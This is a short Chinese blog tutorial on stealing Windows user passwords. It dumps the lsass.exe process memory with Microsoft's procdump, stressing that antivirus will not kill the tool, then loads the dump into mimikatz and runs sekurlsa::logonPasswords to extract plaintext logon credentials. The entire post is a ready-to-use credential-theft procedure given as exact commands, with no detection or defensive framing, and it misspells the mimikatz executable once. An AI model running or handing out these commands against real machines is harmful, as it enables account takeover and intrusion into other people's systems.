Procdump+mimikatz获取Windows用户密码

  1. 引言
  2. 开始
    1. 使用procdump导出lsass.exe
    2. 使用mimikatz获取密码

引言

Procdump,微软出品,不会被杀掉。结合mimikatz可以获取到Windows用户的密码,原理是获取lsass.exe进程中存储的明文登录密码。

开始

使用procdump导出lsass.exe

需要使用管理员权限的cmd

procdump64.exe -ma lsass.exe c:/test.dmp

-ma是指dump出该程序内存中所有的东西

使用mimikatz获取密码

同样需要使用管理员权限的cmd

在命令行中依次输入下面的内容:

# 打开软件
miniskatz.exe
# 载入dmp
sekurlsa::minidump c:/test.dmp
# 获取密码
sekurlsa::logonPasswords

最终结果如图:


如果我的文章能帮到您的话我会很开心.如需转载记得注明出处:)
目录